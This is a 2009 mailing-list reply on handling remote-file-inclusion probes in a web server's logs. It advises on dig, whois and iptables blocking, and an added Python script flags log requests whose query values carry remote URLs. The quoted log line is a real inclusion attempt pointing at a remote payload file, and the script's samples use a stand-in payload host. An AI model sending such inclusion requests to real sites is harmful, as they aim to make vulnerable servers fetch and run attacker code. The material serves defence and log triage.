> It's now 10:45pm CST. I'm still getting this at 1 minute
> intervals,
>
> Warning: Blocking 2.sollink.net
> hamradio.our-klan.com 2.sollink.net - - [30/Aug/2009:14:48:26 -0500] "GET /index1.php?=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 2918 "-" "Mozilla/5.0"
> I even added "All : 65.18.168.84" to the hosts.deny
That doesn't block web access.
>
> I just installed the update on my Bluequartz Server, didn't
> reboot or anything.
> Wish I could email the IP Address.
>
You could dig www.biig.net and get the IP and then do a whois on that IP and get the owner. Chances are they have misconfigured the uploads FTP directory and it's web accessible when it shouldn't be and is being used to try to deliver that fx29id1.txt file to vulnerable sites.
Also, once you have the IP you could block it with:
iptables -I INPUT -s 12.34.56.789 -j DROP
Where 12.34.56.789 is the actual IP.
--
Dan Kriwitsky
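
An added example, not part of the original thread: a small log triage script that separates the two hosts in a request like the one quoted above, the client sending the probe and the host named in the URL passed as a query value (the one to look up with dig and whois). The vhost-prefixed log layout is assumed from the quoted line, and all sample lines, host names and addresses below are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Assumed layout: "<vhost> <client> - - [time] "METHOD target PROTO" status size ..."
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

def remote_include_host(target):
    """Return the host of a URL passed as a query-string value, else None.

    parse_qsl percent-decodes values, so http%3A%2F%2F... is caught too.
    This is a heuristic: a legitimate redirect parameter would also match.
    """
    query = urlsplit(target).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            return urlsplit(value).hostname
    return None

def summarize(lines):
    """Count probes per (client, payload host) pair; skip unparseable lines."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        host = remote_include_host(m.group("target"))
        if host:
            hits[(m.group("client"), host)] += 1
    return hits

# Constructed sample lines (not taken from any real server).
SAMPLE = [
    'www.example.org scanner.example.net - - [30/Aug/2009:14:48:26 -0500] "GET /index1.php?=http://payload.example/cache/x.txt? HTTP/1.1" 404 2918 "-" "Mozilla/5.0"',
    'www.example.org scanner.example.net - - [30/Aug/2009:14:49:26 -0500] "GET /index1.php?page=http%3A%2F%2Fpayload.example%2Fcache%2Fx.txt%3F HTTP/1.1" 404 2918 "-" "Mozilla/5.0"',
    'www.example.org 192.0.2.10 - - [30/Aug/2009:14:50:01 -0500] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for (client, payload), count in summarize(SAMPLE).items():
        print(f"{count} probe(s) from {client} referencing {payload}")
```
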